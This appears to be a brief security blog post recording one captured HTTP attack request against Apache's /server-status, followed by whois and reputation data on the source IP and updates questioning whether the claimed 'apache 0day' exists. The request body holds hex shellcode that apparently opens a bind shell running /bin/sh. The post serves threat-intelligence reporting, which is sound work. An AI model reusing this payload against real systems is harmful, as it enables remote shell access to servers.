BEGIN OF HTTP DATA:
2016-01-01 05:47:15
185.130.5.224
GET /server-status?HTTP_POST=%"%6346#%#/ˠ%"#423|;&HTTP_CGI_GET=GRESYYK"K&J"#L523D2G23H23 HTTP/1.0
User-Agent: apache 0day by @hxmonsegur
Accept: */*
31c031db31c951b10651b10151b1025189e1b301b066cd8089c231c031c95 1516848e51cb966680539b102665189e7b31053575289e1b303b066cd8031
c939c1740631c0b001cd8031c0b03f89d3cd8031c0b03f89d3b101cd8031c0
b03f89d3b102cd8031c031d250686e2f7368682f2f626989e3505389e1b00bcd
8031c0b001cd80
END OF DATA
185.130.5[.]224
- Whois Data (TeamCymru)
- AS : 203569
- IP : 185.130.5.224
- BGP Prefix : 185.130.5.0/24
- CC : LThttps://www.blogger.com/blogger.g?blogID=7778406999173736079#editor/target=post;postID=5908088170526748213
- Registry : ripencc
- Allocated : 2015-12-04
- AS Name: SILK-AS Sindicate Group Ltd,LT
- http://www.team-cymru.org/IP-ASN-mapping.html#whois
- Dynamic Source: IBM X-Force Exchange
- Score: 1.4
- Reference: https://exchange.xforce.ibmcloud.com/ip/185.130.5.224
- Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- Reference: https://isc.sans.edu/api/ip/185.130.5.224
UPDATE:
The vulnerability (if it exists and is not just a marketing idea to push twitter follower) is not reflected by any entry in exploit-db.com or 0day.today
UPDATE 2: (Thanks to@DanielRufde)
https://www.reddit.com/r/security/comments/3z4yiw/user_agent_apache_0day_by_hxmonsegur_new_hacking/cyjxuu0
Keine Kommentare:
Kommentar veröffentlichen